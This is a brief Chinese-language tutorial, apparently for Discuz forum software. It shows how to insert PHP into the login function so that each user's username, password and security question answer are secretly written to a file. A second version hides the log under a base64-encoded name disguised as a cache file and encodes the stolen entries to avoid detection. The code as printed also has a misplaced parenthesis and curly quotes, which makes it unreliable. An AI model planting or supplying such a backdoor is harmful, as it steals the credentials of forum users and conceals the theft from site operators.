//打开source/function/function_member.php

//找到function userlogin

//在return $return;前面加上

$a=file_get_contents(dirname(__FILE__).’/1.txt’);

file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id：”.$username.”—-Psw：”.$password.”—-question：”.$questionid.”—-Answer：”.$answer.”\r\n”);

//记录登陆成功的账号密码以及问题答案！保存在source/function/目录下的1.txt

?>
一般上面的这样容易发现，我会把1.txt改名，并且base64_encode之后再保存。

//base64_encode之后再保存。

$a = file_get_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’));

file_put_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’),$a.base64_encode(“Id：”.$username.”—-Psw：”.$password.”—-question：”.$questionid.”—-Answer：”.$answer).”\r\n”);

?>